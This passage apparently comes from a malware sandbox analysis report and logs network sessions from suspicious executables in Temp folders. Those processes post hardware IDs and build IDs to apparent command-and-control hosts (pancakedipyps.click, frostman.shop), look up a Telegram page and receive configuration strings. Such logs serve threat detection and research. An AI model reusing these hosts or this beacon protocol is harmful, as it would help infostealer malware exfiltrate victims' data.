                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC185INData Raw: 33 34 50 61 6c 77 58 48 78 7a 70 63 5a 35 55 36 6f 48 4a 76 32 2f 6e 73 6d 35 50 2f 32 46 35 38 34 76 6d 32 42 70 71 4b 67 56 75 53 79 38 71 4b 4c 4a 4c 75 48 30 45 76 73 57 4f 46 4a 33 64 6e 31 58 44 76 30 36 2b 74 51 68 33 43 71 4a 59 75 76 34 66 6b 53 37 61 2f 34 70 6f 6b 68 76 73 69 61 42 65 31 47 72 42 53 53 39 4f 74 39 4a 65 4c 79 38 68 75 4b 50 72 35 68 67 4b 65 70 71 6c 69 75 37 72 47 75 6d 57 6e 70 68 36 73 47 35 45 43 69 42 39 33 68 74 32 78 72 36 50 57 39 53 4e 67 79 76 57 57 44 72 36 32 71 57 75 2b 73 2f 36 36 45 49 4c 6e 50 6a 41 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 34PalwXHxzpcZ5U6oHJv2/nsm5P/2F584vm2BpqKgVuSy8qKLJLuH0EvsWOFJ3dn1XDv06+tQh3CqJYuv4fkS7a/4pokhvsiaBe1GrBSS9Ot9JeLy8huKPr5hgKepqliu7rGumWnph6sG5ECiB93ht2xr6PW9SNgyvWWDr62qWu+s/66EILnPjA
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 33 63 63 36 0d 0a 72 76 53 4b 41 66 6b 76 2f 39 63 43 37 72 2f 76 6b 57 6c 33 37 39 4a 59 75 37 34 66 6b 53 77 59 66 45 36 36 41 54 38 64 6a 51 45 71 74 48 72 56 48 46 76 76 56 32 4a 2b 66 32 2b 78 6d 55 4e 4c 70 75 67 4b 69 6c 72 56 76 72 70 76 43 73 68 43 69 31 79 35 51 4e 36 45 4f 75 48 70 4c 32 75 54 74 72 36 4f 47 39 53 4e 67 62 70 47 36 43 70 65 47 2b 48 50 66 67 39 71 58 42 63 66 48 4c 6c 77 33 74 52 61 30 51 6d 2f 62 38 66 53 2f 75 2f 2f 73 54 6c 7a 71 32 5a 49 4f 6e 72 61 39 59 37 36 48 39 6f 6f 34 69 74 49 66 51 53 2b 78 59 34 55 6e 64 7a 2f 70 6a 50 50 2f 31 76 51 2f 57 4a 2f 4e 69 67 4f 50 35 34 56 50 38 71 76 75 6e 68 43 61 30 78 4a 45 4d 35 6b 61 74 47 35 54 32 2f 33 6f 69 2f 66 72 78 48 70 38 77 76 32 75 42 71 61 4b 73 45 71 44 67 39 72 48
                                                                                                                                                                                                                                                                          Data Ascii: 3cc6rvSKAfkv/9cC7r/vkWl379JYu74fkSwYfE66AT8djQEqtHrVHFvvV2J+f2+xmUNLpugKilrVvrpvCshCi1y5QN6EOuHpL2uTtr6OG9SNgbpG6CpeG+HPfg9qXBcfHLlw3tRa0Qm/b8fS/u//sTlzq2ZIOnra9Y76H9oo4itIfQS+xY4Undz/pjPP/1vQ/WJ/NigOP54VP8qvunhCa0xJEM5katG5T2/3oi/frxHp8wv2uBqaKsEqDg9rH
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 35 55 45 37 56 4b 74 48 34 2f 37 36 32 64 72 6f 62 6e 36 43 4e 68 6d 38 31 4f 4c 73 37 47 69 45 4e 2b 32 38 72 2b 4b 4a 4c 32 48 67 55 58 79 41 4b 59 64 33 61 61 35 63 79 54 6d 2b 76 49 52 6b 54 4b 2b 59 49 57 6d 6f 4b 64 57 35 4b 72 78 72 34 63 6f 74 4d 32 64 43 75 46 4a 70 68 6d 61 2f 65 73 31 5a 61 2f 2b 35 56 44 41 66 70 70 69 6e 71 32 78 34 55 32 67 75 62 47 75 6a 57 6e 70 68 35 6f 42 35 45 53 6d 48 5a 76 37 2f 33 67 71 34 50 6a 39 48 35 77 31 75 6d 4f 4e 72 71 53 73 56 76 79 71 2b 71 61 4e 49 4c 33 4b 33 6b 57 72 52 37 6c 52 78 62 37 49 65 43 58 68 2f 75 74 51 68 33 43 71 4a 59 75 76 34 66 6b 53 37 36 7a 2b 71 6f 34 71 73 73 61 55 47 66 6c 4d 71 42 6d 59 38 76 4a 37 4c 66 33 2f 38 68 6d 62 50 62 70 69 68 4b 2b 72 6f 6c 57 75 37 72 47 75 6d 57 6e 70
                                                                                                                                                                                                                                                                          Data Ascii: 5UE7VKtH4/762drobn6CNhm81OLs7GiEN+28r+KJL2HgUXyAKYd3aa5cyTm+vIRkTK+YIWmoKdW5Krxr4cotM2dCuFJphma/es1Za/+5VDAfppinq2x4U2gubGujWnph5oB5ESmHZv7/3gq4Pj9H5w1umONrqSsVvyq+qaNIL3K3kWrR7lRxb7IeCXh/utQh3CqJYuv4fkS76z+qo4qssaUGflMqBmY8vJ7Lf3/8hmbPbpihK+rolWu7rGumWnp
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 49 41 70 68 33 64 70 72 6c 7a 49 75 6e 2b 2b 78 36 4b 4f 37 56 71 67 36 71 6f 70 56 72 74 6f 50 57 74 68 69 79 79 79 35 55 4d 36 45 2b 6c 47 4a 50 33 39 6a 56 6c 72 2f 37 6c 55 4d 42 2b 6b 6e 36 50 72 36 7a 68 54 61 43 35 73 61 36 4e 61 65 6d 48 6b 67 58 75 51 4b 73 58 6d 66 76 2f 66 79 37 76 38 76 34 66 6e 44 69 33 61 6f 79 6f 71 4b 42 55 36 36 72 36 72 34 77 71 74 38 48 65 52 61 74 48 75 56 48 46 76 74 6c 75 4a 75 50 2b 76 51 2f 57 4a 2f 4e 69 67 4f 50 35 34 56 6e 69 70 50 61 70 6a 43 71 35 77 70 6f 42 37 6b 43 70 41 35 58 2b 2f 6d 63 35 37 2f 44 34 48 4a 73 2b 74 32 4f 46 70 61 4b 6c 45 71 44 67 39 72 48 42 63 66 48 71 6b 67 7a 43 52 37 70 52 67 72 44 67 4e 53 7a 6a 75 61 56 51 6d 54 57 35 61 6f 47 67 70 36 4a 5a 36 36 72 77 72 6f 6b 6b 6f 38 53 52 42
                                                                                                                                                                                                                                                                          Data Ascii: IAph3dprlzIun++x6KO7Vqg6qopVrtoPWthiyyy5UM6E+lGJP39jVlr/7lUMB+kn6Pr6zhTaC5sa6NaemHkgXuQKsXmfv/fy7v8v4fnDi3aoyoqKBU66r6r4wqt8HeRatHuVHFvtluJuP+vQ/WJ/NigOP54VnipPapjCq5wpoB7kCpA5X+/mc57/D4HJs+t2OFpaKlEqDg9rHBcfHqkgzCR7pRgrDgNSzjuaVQmTW5aoGgp6JZ66rwrokko8SRB
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 52 78 62 36 2b 64 6a 6e 39 2f 2f 34 47 6d 33 6d 4e 57 36 75 31 71 36 5a 43 36 62 66 2b 36 63 39 70 76 6f 66 47 4d 71 74 4a 70 67 71 4d 36 50 52 6c 4c 4b 2f 47 73 31 43 41 66 75 73 6c 75 61 43 76 72 31 58 34 73 62 79 4f 6c 79 4f 32 31 35 6b 63 35 41 44 76 55 5a 75 2b 6f 53 5a 6c 72 2f 33 73 55 4d 42 75 34 54 37 5a 38 50 62 78 41 50 48 75 36 4f 6d 58 61 65 6d 56 30 45 76 35 41 50 6c 52 32 76 33 72 5a 79 33 73 37 2f 35 58 70 67 43 55 66 34 47 6c 74 72 42 73 30 4b 66 72 70 49 63 2b 6f 49 75 4c 43 4f 56 4f 70 67 66 64 73 4c 6c 36 61 37 66 41 76 56 6a 59 41 66 30 6c 6c 4f 50 35 34 57 66 74 72 76 2b 75 6c 7a 6a 38 34 49 51 47 37 56 65 77 55 64 4f 2b 2f 7a 56 7a 76 37 65 39 46 49 6c 2b 36 7a 58 65 2b 50 54 79 42 62 37 79 37 75 65 59 61 61 65 48 78 6c 6d 6c 41 4c
                                                                                                                                                                                                                                                                          Data Ascii: Rxb6+djn9//4Gm3mNW6u1q6ZC6bf+6c9pvofGMqtJpgqM6PRlLK/Gs1CAfusluaCvr1X4sbyOlyO215kc5ADvUZu+oSZlr/3sUMBu4T7Z8PbxAPHu6OmXaemV0Ev5APlR2v3rZy3s7/5XpgCUf4GltrBs0KfrpIc+oIuLCOVOpgfdsLl6a7fAvVjYAf0llOP54Wftrv+ulzj84IQG7VewUdO+/zVzv7e9FIl+6zXe+PTyBb7y7ueYaaeHxlmlAL
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 39 6a 56 7a 31 72 6d 31 55 4b 64 77 38 33 33 4d 2b 2b 47 55 55 65 43 75 39 72 2b 51 5a 4a 62 4a 6d 51 72 39 55 4c 59 65 33 62 43 35 63 32 75 33 71 37 4e 51 6e 43 2f 7a 50 64 7a 78 2b 76 51 42 75 66 43 6a 74 73 38 77 38 64 48 65 55 37 6b 4f 34 51 50 64 70 72 6b 79 4b 50 33 72 2b 78 4f 4f 50 66 52 62 73 6f 53 76 70 6c 50 34 73 4f 61 6d 7a 67 65 48 35 71 41 31 2f 6b 4f 76 48 35 72 6f 36 44 56 6c 72 2f 61 39 53 4b 46 2b 2b 79 57 7a 37 65 47 35 45 72 62 67 78 4b 71 50 4a 37 62 52 6a 30 62 4d 54 71 59 51 69 2b 37 75 65 6d 54 42 7a 39 78 51 31 6e 36 31 4a 64 54 78 37 2b 46 57 2f 2b 43 70 2b 64 4e 79 35 4a 54 4a 57 37 6c 66 37 77 6a 64 36 4c 6b 74 65 61 47 35 37 31 44 41 66 76 52 6d 6e 72 47 6e 6f 6b 54 74 35 38 2b 58 70 69 65 32 78 6f 67 62 35 6b 79 41 45 6f 7a
                                                                                                                                                                                                                                                                          Data Ascii: 9jVz1rm1UKdw833M++GUUeCu9r+QZJbJmQr9ULYe3bC5c2u3q7NQnC/zPdzx+vQBufCjts8w8dHeU7kO4QPdprkyKP3r+xOOPfRbsoSvplP4sOamzgeH5qA1/kOvH5ro6DVlr/a9SKF++yWz7eG5ErbgxKqPJ7bRj0bMTqYQi+7uemTBz9xQ1n61JdTx7+FW/+Cp+dNy5JTJW7lf7wjd6LkteaG571DAfvRmnrGnokTt58+Xpie2xogb5kyAEoz


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          3192.168.2.549923104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:50 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=WT0O6LZGJFCAJM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 12810
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:14:50 UTC12810OUTData Raw: 2d 2d 57 54 30 4f 36 4c 5a 47 4a 46 43 41 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 54 30 4f 36 4c 5a 47 4a 46 43 41 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 54 30 4f 36 4c 5a 47 4a 46 43 41 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 57 54 30 4f 36 4c 5a 47 4a
                                                                                                                                                                                                                                                                          Data Ascii: --WT0O6LZGJFCAJMContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--WT0O6LZGJFCAJMContent-Disposition: form-data; name="pid"2--WT0O6LZGJFCAJMContent-Disposition: form-data; name="lid"FATE99--test--WT0O6LZGJ
                                                                                                                                                                                                                                                                          2024-12-21 00:14:51 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:51 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=krjij3t8ah2rt2at4r265gjs8v; expires=Tue, 15 Apr 2025 18:01:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0ndBWUhOatDtE04kamLSaY%2Fv2cVbBo8QhUVURMWjLqmp29PD%2BWvOGEzKuGhoSmOCIRYJXvyLjH8XJs9AMO7B6w%2FRvWW6g2C6IhnZ5CQs6OgRiALgQcd8rTHlC1HFeR2QDqe547i"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ac9e9b8c437a-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1894&min_rtt=1813&rtt_var=738&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2848&recv_bytes=13749&delivery_rate=1610590&cwnd=223&unsent_bytes=0&cid=d8b3100f872dc6c8&ts=1263&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:14:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          4192.168.2.549924149.154.167.994434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:50 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                          Host: t.me
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:14:51 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:51 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 12306
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: stel_ssid=b3cf7a09e9b9d46ab1_15968360936506453596; expires=Sun, 22 Dec 2024 00:14:51 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-control: no-store
                                                                                                                                                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                          2024-12-21 00:14:51 UTC12306INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          5192.168.2.549933104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:53 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=ASCZDP6QXSQAS6
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 15052
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:14:53 UTC15052OUTData Raw: 2d 2d 41 53 43 5a 44 50 36 51 58 53 51 41 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 53 43 5a 44 50 36 51 58 53 51 41 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 53 43 5a 44 50 36 51 58 53 51 41 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 41 53 43 5a 44 50 36 51 58
                                                                                                                                                                                                                                                                          Data Ascii: --ASCZDP6QXSQAS6Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--ASCZDP6QXSQAS6Content-Disposition: form-data; name="pid"2--ASCZDP6QXSQAS6Content-Disposition: form-data; name="lid"FATE99--test--ASCZDP6QX
                                                                                                                                                                                                                                                                          2024-12-21 00:14:54 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:54 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=jg56r40i8uo12b2fg30er9kbvq; expires=Tue, 15 Apr 2025 18:01:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pt0O%2F02%2F1smi2xBQONGNU2AjcPhQtFsTh1rE0ivEC71sDy4M9uXFMnbz89ojwx929eigcLRI2CXKNdehWbfxBRVoDVgB74CEX%2FBbbKSVduIj7Wqsk9mArP1cT84U3iW2BGF%2Bhv6h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53acaf6fc0423d-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1628&rtt_var=635&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15991&delivery_rate=1689814&cwnd=186&unsent_bytes=0&cid=60894a493681e357&ts=1020&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:14:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:14:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          6192.168.2.549930116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:53 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:14:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:53 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:14:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          7192.168.2.549941116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:55 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IW4WT2NOZMOZU3E3ECTR
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:14:55 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 49 57 34 57 54 32 4e 4f 5a 4d 4f 5a 55 33 45 33 45 43 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 33 46 35 39 42 43 39 35 38 33 34 31 39 37 30 35 32 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 57 54 32 4e 4f 5a 4d 4f 5a 55 33 45 33 45 43 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 57 54 32 4e 4f 5a 4d 4f 5a 55 33 45 33 45 43 54 52 2d 2d 0d
                                                                                                                                                                                                                                                                          Data Ascii: ------IW4WT2NOZMOZU3E3ECTRContent-Disposition: form-data; name="hwid"D2F3F59BC9583419705248-a33c7340-61ca------IW4WT2NOZMOZU3E3ECTRContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------IW4WT2NOZMOZU3E3ECTR--
                                                                                                                                                                                                                                                                          2024-12-21 00:14:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:56 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:14:56 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 30 7c 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 7c 31 7c 31 7c 30 7c 30 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 3b1|1|1|0|6644e86808f74ca119f7a6243684eab2|1|1|0|0|0|100000|10


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          8192.168.2.549942104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:55 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=AX1FVKTZ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 20506
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
